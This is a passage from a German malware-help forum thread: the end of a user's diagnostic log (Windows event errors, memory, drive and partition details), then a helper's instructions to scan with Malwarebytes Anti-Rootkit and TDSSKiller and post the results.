Resolution: To install the drivers for this device, click "Update Driver", which starts the Hardware Update wizard.


==================== Fehlereinträge in der Ereignisanzeige: =========================

Applikationsfehler:
==================
Error: (07/25/2015 08:59:11 AM) (Source: Application Error) (EventID: 1000) (User: )
Description: Fehlerhafte Anwendung HpqSRmon.exe, Version 10.0.0.202, Zeitstempel 0x46c64b4e, fehlerhaftes Modul HpqSRmon.exe, Version 10.0.0.202, Zeitstempel 0x46c64b4e, Ausnahmecode 0xc0000005, Fehleroffset 0x000032db,
Prozess-ID 0x5dc, Anwendungsstartzeit HpqSRmon.exe0.

Error: (07/22/2015 01:36:55 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Fehlerhafte Anwendung gimp-2.8.exe, Version 2.8.14.0, Zeitstempel 0x00000000, fehlerhaftes Modul libpixman-1-0.dll, Version 0.0.0.0, Zeitstempel 0x0072a5f0, Ausnahmecode 0xc0000005, Fehleroffset 0x00084b3b,
Prozess-ID 0x948, Anwendungsstartzeit gimp-2.8.exe0.

Error: (07/21/2015 09:48:51 AM) (Source: Application Error) (EventID: 1000) (User: )
Description: Fehlerhafte Anwendung gimp-2.8.exe, Version 2.8.14.0, Zeitstempel 0x00000000, fehlerhaftes Modul libpixman-1-0.dll, Version 0.0.0.0, Zeitstempel 0x0072a5f0, Ausnahmecode 0xc0000005, Fehleroffset 0x00084b3b,
Prozess-ID 0x3b0, Anwendungsstartzeit gimp-2.8.exe0.

Error: (07/17/2015 08:19:13 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Fehlerhafte Anwendung HpqSRmon.exe, Version 10.0.0.202, Zeitstempel 0x46c64b4e, fehlerhaftes Modul HpqSRmon.exe, Version 10.0.0.202, Zeitstempel 0x46c64b4e, Ausnahmecode 0xc0000005, Fehleroffset 0x000032db,
Prozess-ID 0xbc4, Anwendungsstartzeit HpqSRmon.exe0.

Error: (07/16/2015 09:06:20 AM) (Source: Perflib) (EventID: 1008) (User: )
Description: PNRPsvcC:\Windows\system32\pnrpperf.dll4

Error: (07/16/2015 09:06:20 AM) (Source: Perflib) (EventID: 1010) (User: )
Description: EmdCacheC:\Windows\system32\emdmgmt.dll4

Error: (07/12/2015 06:51:23 PM) (Source: Windows Search Service) (EventID: 3013) (User: )
Description: Eintrag <C:\USERS\SIRU\APPDATA\LOCAL\SKYPE\APPS\LOGIN\CSS\PLATFORM\UNIX.CSS> in der Hash-Zuordnung kann nicht aktualisiert werden.

Kontext:  Anwendung, SystemIndex Katalog


Details:
	Ein an das System angeschlossenes Gerät funktioniert nicht.   (0x8007001f)

Error: (07/12/2015 06:51:23 PM) (Source: Windows Search Service) (EventID: 3013) (User: )
Description: Eintrag <C:\USERS\SIRU\APPDATA\LOCAL\SKYPE\APPS\LOGIN\CSS\PLATFORM\UNIX.CSS> in der Hash-Zuordnung kann nicht aktualisiert werden.

Kontext:  Anwendung, SystemIndex Katalog


Details:
	Ein an das System angeschlossenes Gerät funktioniert nicht.   (0x8007001f)

Error: (07/12/2015 06:51:23 PM) (Source: Windows Search Service) (EventID: 3013) (User: )
Description: Eintrag <C:\USERS\SIRU\APPDATA\LOCAL\SKYPE\APPS\LOGIN\CSS\PLATFORM\MAC.CSS> in der Hash-Zuordnung kann nicht aktualisiert werden.

Kontext:  Anwendung, SystemIndex Katalog


Details:
	Ein an das System angeschlossenes Gerät funktioniert nicht.   (0x8007001f)

Error: (07/12/2015 06:51:23 PM) (Source: Windows Search Service) (EventID: 3013) (User: )
Description: Eintrag <C:\USERS\SIRU\APPDATA\LOCAL\SKYPE\APPS\LOGIN\CSS\PLATFORM\MAC.CSS> in der Hash-Zuordnung kann nicht aktualisiert werden.

Kontext:  Anwendung, SystemIndex Katalog


Details:
	Ein an das System angeschlossenes Gerät funktioniert nicht.   (0x8007001f)


Systemfehler:
=============
Error: (07/26/2015 08:42:50 AM) (Source: Service Control Manager) (EventID: 7006) (User: )
Description: ScRegSetValueExWFailureCommand%%5

Error: (07/26/2015 08:42:39 AM) (Source: Service Control Manager) (EventID: 7006) (User: )
Description: ScRegSetValueExWStart%%5

Error: (07/26/2015 08:34:15 AM) (Source: Service Control Manager) (EventID: 7022) (User: )
Description: HP CUE DeviceDiscovery Service

Error: (07/26/2015 12:23:43 AM) (Source: Service Control Manager) (EventID: 7022) (User: )
Description: HP CUE DeviceDiscovery Service

Error: (07/25/2015 05:43:32 PM) (Source: netbt) (EventID: 4321) (User: )
Description: Der Name "SIRU-PC        :20" konnte nicht auf der Schnittstelle mit IP-Adresse 192.168.178.39
registriert werden. Der Computer mit IP-Adresse 192.168.178.32 hat nicht
zugelassen, dass dieser Computer diesen Namen verwendet.

Error: (07/25/2015 05:43:32 PM) (Source: netbt) (EventID: 4321) (User: )
Description: Der Name "SIRU-PC        :0" konnte nicht auf der Schnittstelle mit IP-Adresse 192.168.178.39
registriert werden. Der Computer mit IP-Adresse 192.168.178.32 hat nicht
zugelassen, dass dieser Computer diesen Namen verwendet.

Error: (07/25/2015 05:43:32 PM) (Source: netbt) (EventID: 4321) (User: )
Description: Der Name "SIRU-PC        :0" konnte nicht auf der Schnittstelle mit IP-Adresse 192.168.178.39
registriert werden. Der Computer mit IP-Adresse 192.168.178.32 hat nicht
zugelassen, dass dieser Computer diesen Namen verwendet.

Error: (07/25/2015 05:43:32 PM) (Source: Server) (EventID: 2505) (User: )
Description: Aufgrund eines doppelten Netzwerknamens konnte zu der Transportschicht \Device\NetBT_Tcpip_{3BE18EC5-6016-4BA8-A2AC-C3EF36FBF031} vom Serverdienst nicht gebunden werden. Der Serverdienst konnte nicht gestartet werden.

Error: (07/25/2015 04:20:00 PM) (Source: Service Control Manager) (EventID: 7022) (User: )
Description: HP CUE DeviceDiscovery Service

Error: (07/25/2015 04:18:26 PM) (Source: netbt) (EventID: 4321) (User: )
Description: Der Name "SIRU-PC        :20" konnte nicht auf der Schnittstelle mit IP-Adresse 192.168.178.39
registriert werden. Der Computer mit IP-Adresse 192.168.178.32 hat nicht
zugelassen, dass dieser Computer diesen Namen verwendet.


Microsoft Office:
=========================
Error: (07/25/2015 08:59:11 AM) (Source: Application Error) (EventID: 1000) (User: )
Description: HpqSRmon.exe10.0.0.20246c64b4eHpqSRmon.exe10.0.0.20246c64b4ec0000005000032db5dc01d0c6a767ceb15e

Error: (07/22/2015 01:36:55 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: gimp-2.8.exe2.8.14.000000000libpixman-1-0.dll0.0.0.00072a5f0c000000500084b3b94801d0c47291b1c70b

Error: (07/21/2015 09:48:51 AM) (Source: Application Error) (EventID: 1000) (User: )
Description: gimp-2.8.exe2.8.14.000000000libpixman-1-0.dll0.0.0.00072a5f0c000000500084b3b3b001d0c3899107cc8c

Error: (07/17/2015 08:19:13 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: HpqSRmon.exe10.0.0.20246c64b4eHpqSRmon.exe10.0.0.20246c64b4ec0000005000032dbbc401d0c0bd14b744fe

Error: (07/16/2015 09:06:20 AM) (Source: Perflib) (EventID: 1008) (User: )
Description: PNRPsvcC:\Windows\system32\pnrpperf.dll4

Error: (07/16/2015 09:06:20 AM) (Source: Perflib) (EventID: 1010) (User: )
Description: EmdCacheC:\Windows\system32\emdmgmt.dll4

Error: (07/12/2015 06:51:23 PM) (Source: Windows Search Service) (EventID: 3013) (User: )
Description: Kontext:  Anwendung, SystemIndex Katalog


Details:
	Ein an das System angeschlossenes Gerät funktioniert nicht.   (0x8007001f)
C:\USERS\SIRU\APPDATA\LOCAL\SKYPE\APPS\LOGIN\CSS\PLATFORM\UNIX.CSS

Error: (07/12/2015 06:51:23 PM) (Source: Windows Search Service) (EventID: 3013) (User: )
Description: Kontext:  Anwendung, SystemIndex Katalog


Details:
	Ein an das System angeschlossenes Gerät funktioniert nicht.   (0x8007001f)
C:\USERS\SIRU\APPDATA\LOCAL\SKYPE\APPS\LOGIN\CSS\PLATFORM\UNIX.CSS

Error: (07/12/2015 06:51:23 PM) (Source: Windows Search Service) (EventID: 3013) (User: )
Description: Kontext:  Anwendung, SystemIndex Katalog


Details:
	Ein an das System angeschlossenes Gerät funktioniert nicht.   (0x8007001f)
C:\USERS\SIRU\APPDATA\LOCAL\SKYPE\APPS\LOGIN\CSS\PLATFORM\MAC.CSS

Error: (07/12/2015 06:51:23 PM) (Source: Windows Search Service) (EventID: 3013) (User: )
Description: Kontext:  Anwendung, SystemIndex Katalog


Details:
	Ein an das System angeschlossenes Gerät funktioniert nicht.   (0x8007001f)
C:\USERS\SIRU\APPDATA\LOCAL\SKYPE\APPS\LOGIN\CSS\PLATFORM\MAC.CSS


CodeIntegrity Fehler:
===================================
  Date: 2015-04-23 07:24:50.443
  Description: Die Abbildintegrität der Datei "\Device\HarddiskVolume1\Windows\System32\drivers\tcpip.sys" konnte nicht überprüft werden, da der Satz seitenbezogener Abbildhashes auf dem System nicht gefunden wurde.

  Date: 2015-04-23 07:24:50.427
  Description: Die Abbildintegrität der Datei "\Device\HarddiskVolume1\Windows\System32\drivers\tcpip.sys" konnte nicht überprüft werden, da der Satz seitenbezogener Abbildhashes auf dem System nicht gefunden wurde.

  Date: 2015-04-23 07:24:50.412
  Description: Die Abbildintegrität der Datei "\Device\HarddiskVolume1\Windows\System32\drivers\tcpip.sys" konnte nicht überprüft werden, da der Satz seitenbezogener Abbildhashes auf dem System nicht gefunden wurde.

  Date: 2015-04-23 07:24:50.365
  Description: Die Abbildintegrität der Datei "\Device\HarddiskVolume1\Windows\System32\drivers\tcpip.sys" konnte nicht überprüft werden, da der Satz seitenbezogener Abbildhashes auf dem System nicht gefunden wurde.

  Date: 2015-04-23 07:24:50.334
  Description: Die Abbildintegrität der Datei "\Device\HarddiskVolume1\Windows\System32\drivers\tcpip.sys" konnte nicht überprüft werden, da der Satz seitenbezogener Abbildhashes auf dem System nicht gefunden wurde.


==================== Memory info =========================== 

Processor: Intel(R) Core(TM)2 Duo CPU E6750 @ 2.66GHz
Percentage of memory in use: 66%
Total physical RAM: 3324.7 MB
Available physical RAM: 1123.52 MB
Total Virtual: 6894.4 MB
Available Virtual: 4337.23 MB

==================== Drives ================================

Drive c: (BOOT) (Fixed) (Total:445.76 GB) (Free:229.49 GB) NTFS ==>[Laufwerk mit Startkomponenten (eingeholt von BCD)]
Drive d: (RECOVER) (Fixed) (Total:19.99 GB) (Free:10.68 GB) FAT32
Drive f: (USB DISK) (Removable) (Total:14.92 GB) (Free:9.59 GB) FAT32
Drive g: () (Removable) (Total:14.9 GB) (Free:1.29 GB) FAT32

==================== MBR & Partition Table ==================

========================================================
Disk: 0 (MBR Code: Windows 7 or Vista) (Size: 465.8 GB) (Disk ID: D37E1B75)
Partition 1: (Active) - (Size=445.8 GB) - (Type=07 NTFS)
Partition 2: (Not Active) - (Size=20 GB) - (Type=OF Extended)

========================================================
Disk: 1 (MBR Code: Windows XP) (Size: 14.9 GB) (Disk ID: 20124476)
Partition 1: (Not Active) - (Size=14.9 GB) - (Type=0C)

========================================================
Disk: 2 (Size: 14.9 GB) (Disk ID: 00000000)

Partition: GPT Partition Type.

==================== Ende vom log ============================

schrauber · 28.07.2015, 06:46

hi,

Downloade dir bitte

Malwarebytes Anti-Rootkit und speichere es auf deinem Desktop.

Starte bitte die mbar.exe.
Folge den Anweisungen auf deinem Bildschirm gemäß Anleitung zu Malwarebytes Anti-Rootkit
Aktualisiere unbedingt die Datenbank und erlaube dem Tool, dein System zu scannen.
Klicke auf den CleanUp Button und erlaube den Neustart.
Während dem Neustart wird MBAR die gefundenen Objekte entfernen, also bleib geduldig.
Nach dem Neustart starte die mbar.exe erneut.
Sollte nochmal was gefunden werden, wiederhole den CleanUp Prozess.

Das Tool wird im erstellten Ordner eine Logfile ( mbar-log-<Jahr-Monat-Tag>.txt ) erzeugen. Bitte poste diese hier.

Starte keine andere Datei in diesem Ordner ohne Anweisung eines Helfers

Downloade dir bitte

TDSSKiller.exe und speichere diese Datei auf dem Desktop

Starte die TDSSKiller.exe - Einstellen wie in der Anleitung zu TDSSKiller beschrieben.
Drücke Start Scan
Sollten infizierte Objekte gefunden werden, wähle keinesfalls Cure. Wähle Skip und klicke auf Continue.
TDSSKiller wird eine Logfile auf deinem Systemlaufwerk speichern (Meistens C:\)
Als Beispiel: C:\TDSSKiller.<Version_Datum_Uhrzeit>log.txt

Poste den Inhalt bitte in jedem Fall hier in deinen Thread.

Malware vor dem </body> auf mehreren Seiten meines Netzwerks entdeckt (alle auf gleichem Server)

Plagegeister aller Art und deren Bekämpfung: Malware vor dem </body> auf mehreren Seiten meines Netzwerks entdeckt (alle auf gleichem Server)